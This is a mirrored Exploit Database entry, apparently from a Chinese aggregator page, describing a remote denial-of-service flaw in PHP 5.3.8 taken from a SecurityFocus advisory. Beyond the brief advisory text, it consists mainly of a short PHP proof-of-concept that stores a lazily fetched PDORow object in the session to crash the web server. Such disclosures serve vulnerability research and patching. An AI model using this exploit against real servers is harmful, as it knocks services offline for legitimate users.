PHP PDORow Object – Remote Denial of Service

• Exploit Database
• 16 阅读

• 作者： anonymous
  日期： 2011-09-24
• 类别：

  • dos
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/36682/

• source: https://www.securityfocus.com/bid/51952/info
  
  PHP is prone to a remote denial-of-service vulnerability.
  
  An attacker can exploit this issue to cause the web server to crash, denying service to legitimate users.
  
  PHP 5.3.8 is vulnerable; other versions may also be affected. 
  
  <?php
  
  // make a Pdo_Mysql statement before
  
  $result = $stmt->fetch(PDO::FETCH_LAZY);
  
  session_start();
  
  $_SESSION['PDORow'] = $result;
  ?>